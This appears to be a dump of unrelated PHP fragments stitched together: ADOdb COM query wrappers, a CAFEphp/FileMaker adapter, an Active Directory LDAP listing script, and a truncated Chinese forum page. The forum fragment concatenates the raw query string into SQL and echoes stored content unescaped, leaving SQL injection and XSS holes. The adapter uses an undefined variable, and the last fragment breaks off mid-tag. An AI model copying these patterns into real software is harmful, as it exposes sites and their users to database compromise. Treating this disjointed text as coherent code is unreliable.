function &_query($sql, $inputarr = false) { $dbc = $this->_connectionID; // return rs if ($inputarr) { $oCmd = new COM('ADODB.Command'); $oCmd->ActiveConnection = $dbc; $oCmd->CommandText = $sql; $oCmd->CommandType = 1; foreach ($inputarr as $val) { // name, type, direction 1 = input, len, $this->adoParameterType = 130; $p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, strlen($val), $val); //print $p->Type.' '.$p->value; $oCmd->Parameters->Append($p); } $p = false; $rs = $oCmd->Execute(); $e = $dbc->Errors; if ($dbc->Errors->Count > 0) { return false; } return $rs; } $rs = @$dbc->Execute($sql, $this->_affectedRows); if ($dbc->Errors->Count > 0) { return false; } return $rs; }
function doQuery($action) { // Note that because of the way in which CAFEphp and FileMaker are implemented, CAFEphp must be running on the same // machine that is serving as the web server. (You'll note that PHP creates a COM object which looks for a locally // running application.) For this same reason, the server IP and port are irrelevant. $availableActions = array('-delete', '-edit', '-find', '-findall', '-new', '-sqlquery'); if (!in_array(strtolower($action), $availableActions)) { // first off, toss out any requests for actions NOT supported under CAFEphp return new FX_Error("The action requested ({$action}) is not supported in CAFEphp."); } $CAFEphp_res = new COM('CAFEphp.Application'); // although username and password are optional for this function, FX.php expects them to be set if ($CAFEphp_res == false) { return new FX_Error('Unable to load to CAFEphp.'); } if (defined("DEBUG") and DEBUG or DEBUG_FUZZY) { $currentDebugString = "<p>CAFEphp version: " . $CAFEphp_res->Version() . "</p>\n"; $this->FX->lastDebugMessage .= $currentDebugString; if (defined("DEBUG") and DEBUG) { echo $currentDebugString; } } $theResult = $CAFEphp_res->Connect($this->FX->database, $this->FX->DBUser, $this->FX->DBPassword); if ($theResult != 0) { $CAFEphp_res->EndConnection(); switch ($theResult) { case -1: return new FX_Error('Unable to connect. Be sure the FileMaker database and CAFEphp are running.'); break; case -2: return new FX_Error('Certificate not present. You MUST have a certificate.'); break; case -3: return new FX_Error('Certificate is corrupt.'); break; case -4: return new FX_Error('CAFEphp is not running or the demo version has expired.'); break; case -5: return new FX_Error('The current demo of CAFEphp has expired.'); break; default: return new FX_Error('An unknown error has occured while attempting to create the COM object.'); break; } } switch ($action) { case '-delete': case '-edit': case '-find': case '-findall': case '-new': $this->FX->dataQuery = $this->BuildSQLQuery($action); if (FX::isError($this->FX->dataQuery)) { return $this->FX->dataQuery; } case '-sqlquery': // note that there is no preceding break, as we don't want to build a query if (substr(trim($this->FX->dataQuery), 0, 6) == 'SELECT') { $currentSelect = true; $theResult = $CAFEphp_res->Query($this->FX->dataQuery, $this->FX->groupSize); } else { $currentSelect = false; $theResult = $CAFEphp_res->Execute($this->FX->dataQuery); } if ($theResult < 0) { $CAFEphp_res->EndConnection(); switch ($theResult) { case -1: return new FX_Error('No CAFEphp connection for the query.'); break; default: return new FX_Error('An unknown error occured during the query.'); break; } } $this->FX->foundCount = $theResult; $theResult = $CAFEphp_res->FieldCount(); if ($theResult < 0) { $CAFEphp_res->EndConnection(); switch ($theResult) { case -1: return new FX_Error('No CAFEphp connection for the field count.'); break; case -2: return new FX_Error('No query was performed for a field count.'); break; default: return new FX_Error('An unknown error occured during the query.'); break; } } else { $currentFieldCount = $theResult; } for ($i = 0; $i < $currentFieldCount; ++$i) { $theResult = $CAFEphp_res->FieldName($i); if ($theResult == '$-CAFEphpNOCONNECTION') { $CAFEphp_res->EndConnection(); return new FX_Error("No CAFEphp connection while retieving the name of field {$i}."); } elseif ($theResult == '$-CAFEphpNOQUERY') { $CAFEphp_res->EndConnection(); return new FX_Error("CAFEphp returned a \"No Query\" error while retieving the name of field {$i}."); } elseif ($theResult == '$-CAFEphpUNKNOWNERROR') { $CAFEphp_res->EndConnection(); return new FX_Error("CAFEphp returned an unknown error while retieving the name of field {$i}."); } $this->FX->fieldInfo[$i]['name'] = $theResult; $this->FX->fieldInfo[$i]['type'] = 'NO DATA'; $this->FX->fieldInfo[$i]['emptyok'] = 'NO DATA'; $this->FX->fieldInfo[$i]['maxrepeat'] = 'NO DATA'; $this->FX->fieldInfo[$i]['extra'] = ''; } if ($currentSelect) { $tempRow = array(); for ($i = 0; $i < $this->FX->foundCount; ++$i) { for ($j = 0; $j < $currentFieldCount; ++$j) { $theResult = $CAFEphp_res->FieldValue($j); if ($theResult == '$-CAFEphpNOCONNECTION') { $CAFEphp_res->EndConnection(); return new FX_Error("No CAFEphp connection while retieving the value of field {$i} for record {$j}."); } elseif ($theResult == '$-CAFEphpNOQUERY') { $CAFEphp_res->EndConnection(); return new FX_Error("CAFEphp returned a \"No Query\" error while retieving the value of field {$i} for record {$j}."); } elseif ($theResult == '$-CAFEphpUNKNOWNERROR') { $CAFEphp_res->EndConnection(); return new FX_Error("CAFEphp returned an unknown error while retieving the value of field {$i} for record {$j}."); } if (!$this->FX->useInnerArray) { $tempRow[$this->FX->fieldInfo[$j]['name']] = $theResult; } else { $tempRow[$this->FX->fieldInfo[$j]['name']] = array($theResult); } if ($this->FX->fieldInfo[$j]['name'] == $this->FX->primaryKeyField) { $currentKey = $value; } } if ($this->FX->genericKeys || $this->FX->primaryKeyField == '') { $this->FX->currentData[] = $tempRow; } else { $this->FX->currentData[$currentKey] = $tempRow; } $theResult = $CAFEphp_res->MoveNext(); if ($theResult < 0) { $CAFEphp_res->EndConnection(); $next = $i + 1; switch ($theResult) { case -1: return new FX_Error('No CAFEphp connection while moving from record {$i} to {$next}.'); break; case -2: return new FX_Error('There was no current query while moving from record {$i} to {$next}.'); break; default: return new FX_Error('An unknown error occured while moving from record {$i} to {$next}.'); break; } } } } break; default: return new FX_Error("The action requested ({$action}) is not supported in CAFEphp."); break; } $this->FX->fxError = 0; return true; }
function _query($sql,$inputarr=false) { try { // In PHP5, all COM errors are exceptions, so to maintain old behaviour... $dbc = $this->_connectionID; // return rs $false = false; if ($inputarr) { if (!empty($this->charPage)) $oCmd = new COM('ADODB.Command',null,$this->charPage); else $oCmd = new COM('ADODB.Command'); $oCmd->ActiveConnection = $dbc; $oCmd->CommandText = $sql; $oCmd->CommandType = 1; while(list(, $val) = each($inputarr)) { $type = gettype($val); $len=strlen($val); if ($type == 'boolean') $this->adoParameterType = 11; else if ($type == 'integer') $this->adoParameterType = 3; else if ($type == 'double') $this->adoParameterType = 5; elseif ($type == 'string') $this->adoParameterType = 202; else if (($val === null) || (!defined($val))) $len=1; else $this->adoParameterType = 130; // name, type, direction 1 = input, len, $p = $oCmd->CreateParameter('name',$this->adoParameterType,1,$len,$val); $oCmd->Parameters->Append($p); } $p = false; $rs = $oCmd->Execute(); $e = $dbc->Errors; if ($dbc->Errors->Count > 0) return $false; return $rs; } $rs = @$dbc->Execute($sql,$this->_affectedRows, $this->_execute_option); if ($dbc->Errors->Count > 0) return $false; if (! $rs) return $false; if ($rs->State == 0) { $true = true; return $true; // 0 = adStateClosed means no records returned } return $rs; } catch (exception $e) { } return $false; }
$objCommand->Properties["Chase Referrals"] = False; //DEFAULT = False //$objCommand->Properties["Column Names Only"] = True; //DEFAULT = False //$objCommand->Properties["Deref Aliases"] = False; //DEFAULT = False $objCommand->Properties["Page Size"] = 999; //GET AROUND AD'S 1000 RECORD (DEFAULT)LIMIT AND PAGENATES RESULTS $objCommand->Properties["SearchScope"] = 2; //DEFAULT = ADS_SCOPE_SUBTREE(aka 2) ( //$objCommand->Properties["Size Limit"] = 0; //DEFAULT = No Size Limit (An integer value that specifies the size limit for the search. For Active Directory, the size limit specifies the maximum number of returned objects.) //$objCommand->Properties['Sort On']->Value = "name"; //DEFAULT = No Sorting (aka none) $objCommand->Properties["Time Limit"] = 0; //DEFAULT = No Time Limit (An integer value that specifies the time limit, in seconds, for the search.) $objCommand->Properties["Timeout"] = 0; //DEFAULT = No Time Out (An integer value that specifies the client-side timeout value, in seconds.) $Cmd = "<LDAP://>;(objectClass=*);adspath;Subtree"; //YOUR AD SEVER HERE | FQDN or IP $objCommand->CommandText = $Cmd; $objRecordSet = $objCommand->Execute(); $OrderNumber = 0; while (!$objRecordSet->EOF()) { $OrderNumber++; $adspath = $objRecordSet->Fields['adspath']->Value; echo $adspath . "<br>"; $objRecordSet->MoveNext(); } $objRecordSet->Close(); //$objCommand->Close() ; $objConnection->Close(); unset($objRecordSet); unset($objCommand); unset($objConnection);
function &_query($sql, $inputarr = false) { try { // In PHP5, all COM errors are exceptions, so to maintain old behaviour... $dbc = $this->_connectionID; // return rs if ($inputarr) { if (!empty($this->charPage)) { $oCmd = new COM('ADODB.Command', null, $this->charPage); } else { $oCmd = new COM('ADODB.Command'); } $oCmd->ActiveConnection = $dbc; $oCmd->CommandText = $sql; $oCmd->CommandType = 1; foreach ($inputarr as $val) { // name, type, direction 1 = input, len, $this->adoParameterType = 130; $p = $oCmd->CreateParameter('name', $this->adoParameterType, 1, strlen($val), $val); //print $p->Type.' '.$p->value; $oCmd->Parameters->Append($p); } $p = false; $rs = $oCmd->Execute(); $e = $dbc->Errors; if ($dbc->Errors->Count > 0) { return false; } return $rs; } $rs = @$dbc->Execute($sql, $this->_affectedRows, $this->_execute_option); if ($dbc->Errors->Count > 0) { return false; } if (!$rs) { return false; } if ($rs->State == 0) { return true; } // 0 = adStateClosed means no records returned return $rs; } catch (exception $e) { } return false; }
textarea{overflow-y:visible;width:98%;} div{display:inline-block;background:#219ECE;margin:2px;padding:2px;border-radius:4px 4px 4px 4px;} section{padding:5px;background:#188A84;color:#fff;} section h1{margin:13px;font-size:2em;} footer{margin: 0 0 0 15px;color:#fff;} footer a:link, footer a:visited{color:#fff;border-bottom:1px dotted #fff;} </style> </head> <body> <?php if ($id = $_SERVER['QUERY_STRING']) { //列出当前纸片的内容 $rs = $conn->Execute("select * from infinite where id=" . $id); $rs2 = $conn->Execute("select * from infinite where parents_id=" . $rs->Fields['parents_id']->Value); ?> <section> <h1><?php echo $rs->Fields['content']->Value; ?> </h1> <footer> <?php echo $rs->Fields['reply_count']->Value; ?> 个回复 来自<a href="?<?php